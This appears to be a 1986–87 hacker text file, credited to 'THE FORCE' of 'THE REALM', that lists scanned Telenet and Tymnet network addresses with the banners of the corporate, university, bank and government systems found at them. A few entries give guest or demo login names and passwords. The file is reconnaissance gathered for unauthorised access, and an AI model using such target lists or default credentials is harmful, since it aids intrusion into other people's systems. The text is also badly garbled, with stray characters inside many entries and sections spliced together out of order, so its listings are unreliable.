01F15A 311040600146 VCON7 01F03D01A 311040600147 VCON18 01F15D07A 311040600150 VCON0 01F05D05A 311040600155 VCON0 01F10D07A9mR 311040600157 VCON3 01F12D01A 311040600158 VCON3 01F15D01A 311040600162 VCON17 01F10D06A 311040600163 VCON6 01F10D08A 311040600171 VCON3 01F03D03A 311040600177 VCON0 01F144 311040600178 VCON4 01F14D04A 311040600179 VCON3 01F03D02A 311040600250 VCON6 01F16D05A 311040600255 VCON1 01F16D04A 311040600270 VCON4 01F16D03A 311040600275 VCON7 EBGEN-LAKE T E L E N E T 31104080xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~:}~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 07/09/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311040800026 fax 311040800038 VCON1 27L02A 311040800041 VCON1 05F13A 311040800042 VCON3 05F04D51A 311040800043 gateway system 311040800045 311040800048 NOS SOFTWARE SYSTEM 311040800050 311040800076 VCON0 05F15A 311040800121 CIERR 1402 311040800130 SUN MICRO SYSTEMS X25 GATEWAY 31;?1040800133 311040800134 CIERR 1402 311040800139 NOS SOFTWARE SYSTEM 311040800142 311040800154 PRIMENET IVAN 311040800161 VCON3 05F04D52A 311040800163 VCON19 05F13D52A 311040800164 VCON1 05F13D54A 311040800166 VCON14 05F13D51A 311040800168 VCON5 05F04D54A 311040800169 VCON5 05F13D53A 311040800170 VCON0 05F04A 311040800172 VCON0 05F15D55A 311040800173 VCON0 05F15D54A 311040800174 VCON1 AOS/VS 311040800235 VCON4 GLOBAL WEATHER DYNAMICS -MV2- 311040800245 BRIDGE C<+oOMMUNICATIONS GATEWAY 311040800256 vax 311040800330 vax 311040800341 311040800346 T E L E N E T 31104090xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 07/09/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311040900030 VCON1 08F13A 311040900072 311040900224 311040900540 311040900614 311040900641 =j6 311040900679 311040900711 311040900819 Telenet 31104150xxxx Sprint, By: ----====} THE FORCE {====---- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From the Depths of - THE REALM - Last Update: 16/04/87 =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-== 311041500020 DIALOG 31104150002003 host 311041500021 AUTODIAL 311041500027 STANFORD DATA CENTRE 311041500030 311041500033 311041500034 HEC 3110415>00038 311041500045 PRIMENET 19.2.9 CESSF 311041500048 DIALOG 311041500053 311041500057 BURLINGAME DATA CENTRE -SPRINT- 311041500060 ORACLE 311041500067 BURLINGAME DATA CENTRE -SPRINT- 311041500074 311041500075 PRIMENET 20.2.1 MD.SCV 311041500077 PRIMENET 20.2.1 CS.WC 311041500078 PRIMENET 19.4.11 MD.SAC 311041500079 PRIMENET 19.4.6 MD.SFD 311041500085 PRIMENET 19.3.12 COUR 311041500124 311041500125 311041500130 VCON4 05A 311041500135 VCON3 05F16A 31104?1500138 VCON1 05F14A 311041500140 PRIMENET ROSCOA 311041500143 VCON3 05FID51A 311041500151 VCON1 05F14D56A 311041500158 ESPRIT DE CORP INFORMATION NETWORK 311041500167 PRIMENET 19.4.3 VESTEK 311041500169 VCON0 05F14D58A 311041500175 CIERR 1402 311041500215 311041500237 311041500238 VCON5 05F14DS4A 311041500300 311041500360 VTAM USS-1 311041500431 VCON3 05F09A 311041500635 T E L E N E T 311051700xxx NUA'S, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~@)~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - 16/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311051700029 TREASURY VAX T E L E N E T 31106030xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 01/01/1987 =-=-=-=-=-=- AZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311060300020 DARTMOUTH COLLEGE TIMESHARING, D1 31106030002001 DARTMOUTH COLLEGE TIMESHARING, D2 31106030002002 VM/370 31106030002003 31106030002004 31106030002005 DARTMOUTH COLLEGE, 4.3 BSD UNIX (dartvax) ttyh3 31106030002006 VAX 31106030002007 DARTMOUTH COLLEGE LIBRARY 31106030002008 DARTMOUTH COLLEGE, BDS UNIX ttyya 31106030002009 DARTMOUTH COLLEGE LIBRARY ULTRIX-32 31106030002010 DARTMOUTH COLLEGE, 4.3 BSD UNIX !,s(dartvax) ttyh3 31106030002011 T1 THAYER SCHOOL 11/785 VAX/VMS 4.5 31106030002013 VAX 31106030002014 PRIMENET 20.0.4 BA1 31106030002015 PRIMENET 18.2.1 DPC1 31106030002016 DARTMOUTH COLLEGE LIBRARY, 4.2 BSD (libdev) 31106030002017 VAX 31106030002018 VAX 311060300036 host 311060300046 31106030004601 ALTOS 3068 31106030004604 DEV1 UNIX 31106030004605 DEV2 UNIX 311060300051 CHUBB LIFEAMERICA ONLINE SYSTEM 311060300052 DIGITAL'S EASYNET VAX.29 DECNET GATEWAY 311060300053 DIGITAL' CKjSTEM B - IKJ54012A C - IKJ54012A D - USA TEST SYSTEM E - USA TEST SYSTEM F - USA TEST SYSTEM G - CANADIAN TEST SYSTEM H - AUTOTRAK SYSTEM I - COLLISION ESTIMATING SYSTEM J - COLLISION ESTIMATING SYSTEM K - CO D+9LLISION ESTIMATING SYSTEM L - AUTOTRAK PILOT SYSTEM M - PALTEST SYSTEM N - ATLAS TEST SYSTEM O - ATLAS TEST SYSTEM Q - ADDS TEST SYSTEM R - COLLISION ESTIMATING SYSTEM U - DAMAGEABILITY TEST SYSTEM W - TSS WYLBUR X - IKJ54012A Ej.^ Y - COLLISION ESTIMATING SYSTEM Z - COLLISION ESTIMATING SYSTEM 311031300120 X25I00 311031300131 DTSS 311031300132 311031300135 host 311031300140 CIERR 1402 311031300162 X25E00 311031300163 X25A00 311031300164 VM/TEXT 311031300170 CA.S.C. NETWORK 311031300172 OLLIE 311031300202 MERIT COMPUTER NETWORK 311031300250 CIERR 1402 311031300251 311031300262 311031300333 MULTICS 311031300365 MULTICS 311031300367 MULTF*KICS 311031300370 PRIMENET 20.0.3 MD.DET 311031300371 PRIMENET 20.2.1 CS.DET 311031300372 PRIMENET 19.4.5 MD.DTA 311031300376 PRIMENET 20.0.4 MD.DAC 311031300619 T E L E N E T 311031400xxx NUA'S, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - 16/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 31103140G>d0035 VCON0 23L01A T E L E N E T 311040100xxx NUA'S, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - 16/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311040100025 PRIMENET 20.1.1 LSIS 311040100042 host 311040100126 VM/370 311040100127 VM/370 311040100128 VM/370 311040100612 MODEMCITY T E L E N H`2JE T 31104020xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 02/09/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311040200040 host 311040200060 311040200602 T E L E N E T 31104030xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~IL~~~~~~~ From the depths of - THE REALM - 03/09/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311040300143 311040300263 311040300270 311040300737 311040300852 T E L E N E T 31104040xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 04/09/86 =-=-=-=-=-=-=-=-=-=-=-=-=-=-J_=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311040400005 311040400007 311040400020 SITENET 311040400021 311040400027 PRIMENET EM1 311040400029 PRIMENET TLNT TP SYS NASA 311040400033 VCON24 08A 311040400035 VCON6 08F03D02A 311040400036 VCON1 29L01A 311040400037 VCON6 08F03A 311040400051 SYSTAR CORPORATION GATEWAY 311040400072 host 311040400077 311040400079 311040400109 311040400110 VCON0 08F03D04A 311040400130 311040400138 VCON5 08B 311040400139 VCON6 08F03D01A 311Ky040400153 311040400232 311040400248 fax 311040400249 fax 311040400256 fax 311040400270 fax 311040400530 VCON2 08F03D08A 311040400612 VCON5 08F03A 311040400619 CON4 08A 311040400626 fax 311040400634 VAX SYSTEM 311040400635 VAX SYSTEM 311040400638 TSX-PLUS 311040400643 311040400651 311040400670 VAX SYSTEM T E L E N E T 031104050xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of -L&~) THE REALM - 05/09/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311040500030 fax 311040500031 311040500045 HERTZ CCP T E L E N E T 031104060xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the Depths of - THE REALM - 06/09/86 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=7gO-=-=-=-=-=-=-=-=-= 311040600033 VCON1 01F16A 311040600036 VCON7 01F12A 311040600038 VCON0 01F10A 311040600039 VCON2 01F09A 311040600041 VCON2 01F14A 311040600044 VCON26 01F16D06A 311040600045 VCON3 01F16D07A 311040600046 VCON2 22L01A 311040600051 VCON1 01F14D01A 311040600052 VCON0 01F14D06A 311040600053 VCON0 01F14D05A 311040600058 VCON0 01F12D04A 311040600061 host 311040600062 VCON2 01F09D04A 311040600063 VCON7 01F09D03A 311040600065 VCON5 01F09D01A 311?£11021900007 PRIMENET 20.1.1A NODE.5 311021900008 PRIMENET 20.1.1A NODE.8 311021900010 LINCOLN NATIONAL CORPORATION 311021900035 MHP201A Sprint Not completed Due to incredibly slow responce END ENDNODE.2 311021900006 PRIMENET 20.1.1A NODE.4 311021900007 PRIMENET 20.1.1A NODE.5 311021900008 PRIMENET 20.1.1A NODE.8 311021900010 LINCOLN NATIONAL CORPORATION 311021900035 MHP201A Sprint Not completed Due to incredibl HP-3000 0311021400177 0311021400276 NOS SIFTO 311030100353 PRIMECON NETWORK System 53 311030100354 PRIMECON NETWORK System 54 311030100355 PRIMECON NETWORK System 55 311030100356 PRIMECON NETWORK System 56 311030100357 PRIMECON NETWORK System 57 311030100358 PRIMECON NETWORK System 58 311030100359 PRIMECON NETWORK System 59 311030100361 PRIMECON NETWORK System 61 311030100363 PRIMECON NETWORK System 63 311030100364 PRIMECON NETWORK System 64 311030100391 PRIMECON NETWORK System 91 311030100392 PRIMECON NP]q3ETWORK System 92 311030100393 PRIMECON NETWORK System 93 311030100394 PRIMECON NETWORK System 94 311030100395 PRIMECON NETWORK System 95 311030100398 DIALCOM INHOUSE System 98 311030100399 PRIMECON NETWORK System 99 311030100412 THE SOURCE 311030100431 VOLITAN 1 311030100609 VAX 311030100613 311030100615 311030100617 311030100619 311030100629 DATASHARE SYSTEM ON-LINE 311030100635 host UNIVERSITY OF MERYLAND 311030100637 host 311030100638 311030100650 PRIME Q/eNET 19.4.2 CRIS T E L E N E T 311030500xxx NUA'S, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - 16/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311030500020 HP-3000 311030500022 HP-3000 T E L E N E T 311031200xxx NUA'S, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Rk;5~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - 16/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311031200035 VTAM/TSO 311031200036 UNIVERSITY OF C COMPUTATION CENTRE PACX2000 311031200049 AHSC ASAP SYSTEM 311031200050 T E L E N E T 0311031300xxx Sprint, By: ----====} THE FORCE {====---- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From The De B{pths Of - THE REALM - Last Updates: 16/04/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 31103130025 COMSHARE SYS: 18 - COMMANDER II SYS: 15 - COMMANDER II SYSTEM M 31103130037 TSS 31103130040 AUTONET 31103130041 AUTONET LINE 3130158020 31103130062 MERIT COMPUTER NETWORK 31103130063 31103130071 TOPS-20 31103130077 31103130083 VM, TSO 31103130085 host system A - COLLISION ESTIMATING SYT<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - Last Updated: 07/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311030100020 ELHILL3 311030100022 MULTICS MR10.2Q: DOCKMASTER 311030100024 THE SOURCE System 10 311030100026 DNAMD1 Online 311030100028 THE SOURCE System 13 311030100031 PRIMENET 19.1.6 NUSA 311030100033 UNITED COMMUNICATIONS SERVICES GROUP 311030100037 311030100038 THE SOURCU(X E System 11 311030100045 311030100047 THE SOURCE System 12 311030100048 THE SOURCE System 12 311030100049 THE SOURCE System 7 311030100052 311030100057 311030100058 CDA ONLINE SERVICES 311030100065 PRIMENET 19.4.6.r8c APHISB 311030100100 UNITED COMMUNICATIONS COMPUTER SERVICES GROUP 311030100125 VAX 311030100134 311030100150 VAX 311030100157 VAX 780+ ECRUOS HOSE COMPANY 311030100159 THE SOURCE 311030100160 NAVY ELECTRONIC MAIL SERVICES ULTRIX-32 V1.1 31103Ved0100161 311030100162 THE SOURCE 311030100168 VAX MicroVMS V4.4 311030100170 SYS/32 VOS UNITED COMMUNICATIONS COMPUTER SERVICES GROUP 311030100173 311030100175 311030100222 PRIMECON NETWORK system 50 311030100224 PRIMECON NETWORK system 61 311030100235 311030100236 311030100238 UNITED COMMUNICATIONS SERVICES GROUP 311030100241 PRIMECON NETWORK system 57 311030100243 PRIMECON NETWORK system 52 311030100251 PRIMENET 19.4.2.R3 CGYARD 311030100266 PRIMENWr?ET 20.1.1 CAP1 311030100267 PRIMENET 19.4.8 FNP.DC 311030100269 PRIMENET 20.0.2 VIENNA 311030100332 PRIMECON NETWORK System 32 311030100333 PRIMECON NETWORK System 33 311030100334 PRIMECON NETWORK System 34 311030100335 PRIMECON NETWORK System 35 311030100336 PRIMECON NETWORK System 36 311030100337 PRIMECON NETWORK System 37 311030100338 PRIMECON NETWORK System 38 311030100339 PRIMECON NETWORK System 39 311030100340 PRIMECON NETWORK System 40 311030100341 N,|PRIMECON NETWORK System 41 311030100342 PRIMECON NETWORK System 42 311030100343 PRIMECON NETWORK System 43 311030100344 PRIMECON NETWORK System 44 311030100345 PRIMECON NETWORK System 45 311030100346 PRIMECON NETWORK System 46 311030100347 PRIMECON NETWORK System 47 311030100348 PRIMECON NETWORK System 48 311030100349 PRIMECON NETWORK System 49 311030100350 PRIMECON NETWORK System 50 311030100351 PRIMECON NETWORK System 51 311030100352 PRIMECON NETWORK System 524YK20100138 HP-3000 311020100139 CHEMNETWORK 311020100141 host 311020100055 311020100164 VU TEXT 311020100167 ULTRIX-32 V1.0 (THUMPER) TTY 311020100171 MHP201A T1015801 VERSION 4 311020100200 DUNN AND BRADSTREET SYSTEMS D&B 311020100201 DUNN AND BRADSTREET SYSTEMS D&B003 311020100220 INVESTMENT TECHNOLOGIES 311020100230 PRIMENET 20.2.1 NYMCS 311020100232 PRIMENET 19.4.10 MD.NJ 311020100240 D&B SYSTEM db002i 311020100241 D&B SYSTEM db003i 311020100242 D&B SY5Z#STEM db003i 311020100243 D & B 311020100244 D&B SYSTEM db002i 311020100245 D&B SYSTEM db003i 311020100246 D&B SYSTEM db002i 311020100252 PRIMENET 19.4.6 BOR 311020100334 'RELIANCE SIGN ON SCREEN' P-E 311020100346 311020100434 PRIMECON NETWORK system 34 311020100444 PRIMECON NETWORK System 44 311020100605 LIP3 311020100751 ICI/90 SYS MV-11/13 311020100830 ICI/90 SYS MV-10/12 311020100841 ICI/90 SYS MV-11/4 311020100899 fax 311020100914 ICI/90 SYS MV-0/3 316[%1020100999 fax T E L E N E T 311020200xxx NUA'S last Update 12/03/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311020200010 PRIME SYSTEM 311020200043 DG AOS/VS 01C 311020200049 IBM TCAM 'ENTER SYSTEM ID:' 311020200126 311020200131 311020200139 TOPS-10 TRI-SMP 311020200141 VAX/VMS AMERICAN PSYCHIATRIC ASSOCIATION 311020200142 VAX/VMS AMERICAN PSYCHIATRIC ASSOCIATION 311020200144 TOPS-20 TRI-SMP 311020200156 VAX/VMS 7\7AMERICAN PSYCHIATRIC ASSOCIATION 311020200201 COMPUSERVE 311020200202 COMPUSERVE 311020200205 GM PARTS FPL 311020200206 GM PARTS FPL 311020200214 PRIMENET 19.4.5 SPA 311020200218 PRIMENET 19.4.11 GEC 311020200224 GM PARTS FPC T E L E N E T 311021200xxx Sprint, By: ----====} THE FORCE {====---- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From the depths of - THE REALM - Last Updated: 16/04/87 =-=-=-=-=-=-=-=-=-=-8]F"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311021200002 VM/CMS 311021200021 PRIMENET 19.4.9 SYSA 311021200022 VM/CMS LINE 155 SYS0 311021200023 IS4000 25-21 311021200030 EDS TIMESHARING 311021200031 VM/370 311021200032 311021200039 PRIMENET 19.4.5native 311021200052 PRIMENET 20.0.4 SYSA 311021200055 311021200056 CITIBANK CASH MANAGER 311021200061 IS4000 25-13 311021200062 IS4000 25-25 311021200064 IS4000 25-09 311021200065 IS4000 02-09 319^\1021200067 IS4000 02-14 311021200084 DATAMORE TIMESHARING 311021200087 IS4000 02-45 311021200090 IS4000 21-58 311021200112 VM/370 311021200115 IS4000 25-45 311021200121 IS4000 25-33 311021200122 VM/CMS LINE 14E SYS0 311021200124 MAIL SYSTEM 311021200128 VM/CMS 311021200130 MORGAN STANLEY NETWORK 311021200131 VM/370 311021200133 TOBAS NEW YORK SYSTEM 311021200141 311021200142 311021200145 OFFICE INFORMATION SYSTEM (GUEST/GUEST) 311021200150 CONIO 31102120:_|0151 311021200152 VAX 311021200155 PRIMENET 20.2.0.SAL.VC.32 NY06 311021200156 PRIMENET 20.2.0.SAL.VC.32 NY71 311021200167 PRIMENET 20.1 MPISBS 311021200254 SHEARSON LEHMAN EXPRESS INFO 311021200315 311021200322 311021200335 VM/CMS LINE 15D SYS R 311021200361 PRIMENET 20.2.0.SAL.VC.28 NY03 311021200362 PRIMENET 21.0.SAL.32 NY90 311021200363 PRIMENET 20.2.0.SAL.VC.28 NY70 311021200372 PRIMENET 20.2.0.SAL.VC.28 NY05 311021200373 PRIMENET 20.2.0.SAL.VC.28 NY05 ;`Ǒ311021200374 PRODUCTION SYSTEM 311021200375 PRIMENET 20.2.0.SAL.VC.28 NY04 311021200450 PRIMENET 20.2.0.SAL.VC.28 NY02 311021200471 PRIMENET 20.2.0.SAL.VC.28 NY06 311021200472 PRIMENET 20.2.0.SAL.VC.28 NY08 311021200473 PRIMENET 20.2.0.SAL.VC.28 NY09 311021200474 PRIMENET 20.2.0.SAL.VC.28 NY50 311021200475 PRIMENET 21.0.SAL.32 NY90 311021200476 PRIMENET 20.2.0.SAL.VC.28 NY51 311021200477 PRIMENET 20.2.0.SAL.VC.28 NY10 311021200535 311021200536 311021200611 VM/37<aW&0 311021200614 311021200620 RSTS 311021200631 311021200715 PRIMENET 20.2.0.SAL.VC.28 NY51 311021200720 PCI 76 311021200729 311021200732 IS4000 17-33 311021200733 IS4000 17-36 BRANCH 1 311021200737 SELIGMAN AND LATZ ONLINE SYSTEM (type SY) 311021200741 PRIMENET 20.2.0.SAL.VC.28 NY50 311021200753 SELIGMAN AND LATZ ONLINE SYSTEM 311021200755 VM/370 311021200756 T E L E N E T 031102140xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=b|T~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 22/12/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 0311021400042 DNA 0311021400056 PRIMENET 20.1.19 BOWSER 0311021400062 PRIMENET 20.1 TRUSWL 0311021400075 NOS SOFTWARE SYSTEM 0311021400141 HP-3000 0311021400149 FAST TAX 0311021400154 ECA'S VAX 0311021400156 HP-3000 0311021400177 0311021400276 NOS SIFT>M%sWARE SYSTEM 0311021400277 NOS SOFTWARE SYSTEM 0311021400376 EDS NET 0311021400607 HP-3000 T E L E N E T 031102190xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 05/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311021900005 PRIMENET 20.1.1A NODE.2 311021900006 PRIMENET 20.1.1A NODE.4 3)dj06093 NALCO CHEMICAL COMPANY NETWORK 3106006121 CORPORATE MANAGEMENT INFO SERVICE 3106006187 3106006190 CLEVELAND 3106006191 3106006227 3106006251 3106006281 EDCS 3106006283 EDCS 3106006296 3106006432 EASYLINK 3106006434 EASYLINK 3106006440 BJAC host - VM/370 system 3106006590 US CENTRA SERVICE 3106006597 3106006686 3106006722 INTERNATIONAL NETWORK 3106006828 fax 3106006832 A&A DATANET (SYSTEMS 1,8,0,14) 3106006834 3106006835 TOC 3106006867 *eMkDATABILITY TIMESHARING SYSTEM II 3106006994 3106007028 fax 3106007103 3106007177 3106007272 (CIER 1402) 3106007352 PRIMENET 3106007377 3106007596 (host) A - VM/370, B - VM/370 3106007640 3106007689 3106007719 3106007753 LANDART SYSTEMS INC 3106007766 McDONELL DOUGLASS CORP DEMO FACILITY 3106007822 3106007994 (HOST) 3106008032 MORGAN STANLEY NETWORK T Y M N E T 310670xxxx sprint, by: ----====} THE FORCE {====---- From the Depths of - THE REALM - La+f8 st Update: 02/04/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 3106070004 3106070008 3106070028 MARKETING #1 3106070081 3106070091 #2 CASTER BACKUP 3106070116 TSO 3106070165 3106070242 3106070434 3106070482 fax 3106070492 VAX/KL-1/KL-2/BM VAX-2/PC-IBM 3106071629 NALCO CHEMICAL COMPANY 3106071657 CORPORATE MANAGEMENT INFORMATION SYSTEM 3106072126 US CENTRA SERVICE 3106072133 3106072222 3106072258 INTERNATIONAL NETWORK 3106072530 3,g?̑106072564 fax 3106072639 3106072713 3106072808 HP-3000 3106072913 3106072976 3106073013 3106073125 3106073162 3106073225 TECHNICAL SUPPORT PRODUCTIONS 3106073289 LANDART SYSTEMS 3106073302 MCDONNEL DOUGLASS CORPORATE DEMO FACILITY 3106073358 3106073420 3106073459 3106073530 3106073568 T Y M N E T 310690xxxx sprint, by: ----====} THE FORCE {====---- From the Depths of - THE REALM - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 310690006-h^-1 DIALOG 3106900109 TYMNET/VCCPAC Inter-Link 3106900146 TTY61 System III DEC System 20 3106900168 TYMNET-NEWARK/TSN-MRI Inter-link 3106900408 TYMNET-NEWARK/TSN-MRI Inter-link 3106900464 3106900515 ONTYME II 3106900788 TYMNET-6754/McGRAW HILL Inter-link 3106900803 DIALOG 3106900832 ONTYME II 3106900858 3106900917 3106901042 IDC/370 3106901087 AUGMENT 3106901088 AUGMENT 3106901132 rca GATEWAY 3106901285 UNI-COLL CORP 3106901303 fax 3106901304 ONTYME I.i;4I 3106901403 wui GATEWAY 3106901508 IDC/370 3106901596 wui GATEWAY 3106901614 3106901628 fax 3106901631 3106901634 3106901637 fax 3106901963 ftcc REMOTE NETWORK 3106902098 D&B (U:COMMANDO, RAMBO, TERMINATOR) 3106902204 3106902256 ONTYME II 3106902257 ONTYME II 3106902258 ONTYME II 3106902259 ONTYME II 3106902260 ONTYME II 3106902261 ONTYME II 3106902540 TYMNET-PUBLIC NET/CIDN2540 Inter-link 3106902588 rca GATEWAY 3106902700 3106902770 3106902923 CY/j47BER SERVICE 3106903035 3106903218 3106903321 3106903607 HOST SYSTEM (type AA) 3106903797 wui GATEWAY 3106904037 ftcc REMOTE NETWORK 3106904092 3106904109 3106904194 3106904305 trt GATEWAY 3106904573 TNET host 3106904580 TSO 3106904703 rca GATEWAY 3106904828 VTAM003 3106904831 RONNIE HOST 3106905000 ftcc REMOTE NETWORK 3106905125 3106905265 rca GATEWAY 3106905277 STRATUS 32 3106905279 STRATUS 32 3106905361 WSI2 (username: DEMO) 3106905362 WSI1 3106905525 0kU} ALSY VAX 3106905564 STRATUS 32 3106905810 TYMNET SF 3106905854 3106905947 TYMNET/DAMPAC Inter-link 3106906015 3106906095 fcct REMOTE NETWORK 3106906250 OCLC 3106906318 MCII 3106906337 TYMNET [ffx] 3106906404 3106906415 VM/370 3106906432 EASYLINK 3106906434 EASYLINK 3106906617 wui GATEWAY 3106907148 ONTYME II 3106907152 ONTYME II 3106907153 ONTYME II 3106907154 ONTYME II 3106907318 VM/370 3106907626 TECHNICAL SUPPORT PRODUCTIONS 3106907884 wui GAT1lvGHEWAY 3106907916 wui GATEWAY 3106908042 TYMNET ffx 3106908118 rca GATEWAY T E L E N E T 031102010xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - Last Update: 18/04/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311020100014 NJIT ELECTRONIC INFORMATION EXCHANGE SYSTEM (EIES) 311020100015 NJIT ELECTRONIC INF2mORMATION EXCHANGE SYSTEM (EIES) 311020100020 VM/370 CDCVM01 311020100025 NJIT ELECTRONIC INFORMATION EXCHANGE 311020100027 VCON1 IRFC-REV6.03 311020100028 NDC (host) 1 - EDS VM NDC01, 5 - EDS VM L7.01A, 7 - TELMAR NDC07, 311020100030 NDC (host) 311020100031 VAX 311020100032 D&B SYSTEM db003i 311020100033 311020100034 PRIMENET 19.4.9 MWH 311020100035 311020100040 